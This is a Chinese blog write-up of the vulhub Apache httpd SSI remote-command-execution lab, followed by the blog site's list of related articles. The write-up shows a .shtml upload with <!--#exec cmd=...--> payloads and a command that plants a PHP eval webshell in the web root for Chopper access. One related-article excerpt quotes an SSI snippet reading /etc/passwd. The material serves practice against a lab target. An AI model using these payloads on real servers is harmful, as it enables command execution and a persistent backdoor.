vulhub-httpd中ssi-rce

最新推荐文章于 2024-04-24 14:54:57 发布
最新推荐文章于 2024-04-24 14:54:57 发布
阅读量606 收藏
点赞数
分类专栏: 靶场 vulhub 文章标签: php 安全漏洞 apache ssi cgi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26947429/article/details/118999091
版权

漏洞原理

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。
如果目标服务器开启了SSI与CGI支持,我们可以上传一个后缀为shtml文件
并利用<!--#exec cmd="id" -->语法执行任意命令。

第一步访问没有主页面利用目录扫描工具扫出目录
在这里插入图片描述
测试上传文件限制
在这里插入图片描述
在这里插入图片描述
很显然不能上传.php文件
可已上传一个.shtml文件来执行命令
文件里面是`

<!--#exec cmd="whoami" -->`

在这里插入图片描述
命令执行成功!
然后开始进行菜刀连接
在1.shtml里面写入

<!--#exec cmd="echo '<?php @eval($_POST['shell']);?>' > /var/www/html/shell.php" -->

在靶机网页主目录下面写入一句话文件再用菜刀进行连接
在这里插入图片描述

没毛病!!!!

rurald
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
SSI.rar_SSI SSI_SSI-DATA_SSI接口
09-24
SSI(同步串行接口),在easyarm1138上的实现代码
使用自动 SSI-COV 算法进行操作模态分析:使用应用于环境振动数据的 SSI-COV 算法自动识别线状结构的模态参数-matlab开发
05-31
## 概括 SSICOV.m 函数旨在仅使用环境振动自动识别线状结构的特征频率、振型和阻尼比。 协方差驱动的随机子空间识别方法(SSI-COV)与聚类算法结合使用以自动分析稳定图。 该算法的灵感来自 Magalhaes 等人使用的算法。 [1]。 它已被应用于Lysefjord桥的环境振动监测[2],并与频域分解技术[3]进行了比较。 最后,发现该算法足够准确,可以将电桥本征频率随温度的演变可视化 [4]。 ## 内容 提交文件包含: - 数据文件 BridgeData.mat - 说明算法应用的 Matlab Live Script Example1.mlx。 - 一个 Matlab 实时脚本 Example1_noToolbox.mlx,它重现了 Example1,但使用了函数 SSICOV_noToolbox。 - 功能 SSICOV,它是自动 SSI-COV 算法。 - 函数
ssi-uploader:一个很棒的jQuery上传器
05-17
ssi上载器 一个很棒的jquery上传器。 文档和示例: ####安装: 用安装 npm install ssi-uploader 安装 bower install ssi-uploader 或只是下载并包含文件。 < link rel =" stylesheet " href =" dist/ssi-uploader/styles/ssi-uploader.css "/> < script src =" dist/ssi-uploader/js/ssi-uploader.min.js " > </ script > 要测试它: git clone https://github.com/ssbeefeater/ssi-uploader.git cd ssi-uploader npm install gulp
webpack-ssi-include-loader:废弃寻找 SSI 的 html 内容包括模板字符串,
05-29
Webpack SSI 包含加载器 描述 这个包的创建是为了帮助那些必须使用 SSI 和 webpack 的开发人员。 它将有助于设置开发环境。 扫描 html 内容寻找模式,如: <!--#include virtual="/your/path/file.html" --> <!--#include file"/your/path/file.html" --> 如果发现任何: 首先查看本地机器上是否可以找到该文件,按照localPath 如果没有,请尝试按照location http url在线查找文件 如果不是,则返回错误消息 用法 yarn add webpack-ssi-include-loader module : { rules : [ ... . { test : / \. html?
基于spring 的ssi-uploader的多图片上传
05-14
基于spring 的ssi-uploader的多图片上传基于spring 的ssi-uploader的多图片上传
07 - vulhub - Apache SSI 远程命令执行漏洞,带你碾压面试官
m0_67621628的博客
03-22 634
<!--#echo var="cat /etc/passwd" --> []( )漏洞复现 []( )环境准备 靶机环境 139.196.87.102 (vulhub) 攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp) 启动 Apache SSI 远程命令执行漏洞 环境 1.进入 vulhubssi-rce 路径 cd /usr/local/tools/vulhub/httpd/ssi-rce 2.编译并启动环境 docker-c
vulhub-httpd-ssi-rce
Ronin_qianmo的博客
07-27 470
1、漏洞描述 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSICGI支持,我们可以上传一个shtml文件,并利用#exec cmd=“id” 语法执行任意命令。 2、漏洞原理 SSI(服务器端包含)是放置在HTML页面的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面, 而不必通过CGI程序或其他动态技术来提供整个页面。 其实apache的ssl更像是flask的jinjia2,用来实现和前端实现一种动态交
[Vulhub] Apache HTTPD解析漏洞 & Apache SSI RCE
weixin_45605352的博客
06-07 650
文章目录Apache HTTPD 换行解析漏洞(CVE-2017-15715)0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现Apache HTTPD 多后缀解析漏洞0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现Apache SSI 远程命令执行漏洞0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 0x00
利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
JiangBuLiu的博客
06-28 1309
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSICGI支持,我们可以上传一个shtml文件,并利用<!--#...
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
黑白的博客
12-21 469
声明 好好学习,天天向上 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞与CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-201
httpd安装包--httpd安装包
02-20
rpm -Uvh --force --nodeps *.rpm httpd rpm安装包
tomcat-connectors-1.2.32-windows-i386-httpd-2.0.x.rar
09-17
tomcat-connectors
centos-logos-httpd-85.8-2.el8.noarch(1).rpm
12-06
离线安装包,亲测可用
And-httpd web server-开源
04-24
And-httpd是将URL映射到文件的HTTP服务器。 目前,它为抵御远程攻击提供了2000美元的“安全保证”。
u-boot-hg255d-httpd-115200.bin
02-21
u-boot-hg255d-httpd-115200.bin
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 483
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
Android配置环境
最新发布
u012627628的博客
04-24 306
执行命令:sudo mv /home/用户名/Downloads/android-sdk-linux /usr/java。sudo mv /home/用户名/Downloads/jdk1.8.0_271 /usr/java。执行命令:/usr/java/android-sdk-linux/tools/android。执行命令:tar -zxvf android-sdk-linux.tgz。执行 source /etc/profile。验证是否安装成功(我验证是成功的)执行:java -version。
bugku ezbypass
m_de_g的博客
04-23 214
bugku ezbypass $++,$_++
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 563
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
Job for jbcs-httpd24-httpd?service failed because the control process exited with error code. See "s
01-06
根据提供的引用内容,"Job for jbcs-httpd24-httpd?service failed because the control process exited with error code. See "s" 是一个错误信息,它指示jbcs-httpd24-httpd服务的控制进程退出时出现错误。为了获取更多详细信息,可以使用以下命令: ```shell systemctl status jbcs-httpd24-httpd.service journalctl -xe ``` 第一个命令将显示jbcs-httpd24-httpd服务的状态,包括错误信息和日志。第二个命令将显示系统日志的最后几行,其可能包含有关服务错误的更多详细信息。 请注意,"jbcs-httpd24-httpd"是一个示例服务名称,实际的服务名称可能会有所不同。根据您的实际情况,将"jbcs-httpd24-httpd"替换为您遇到问题的服务名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值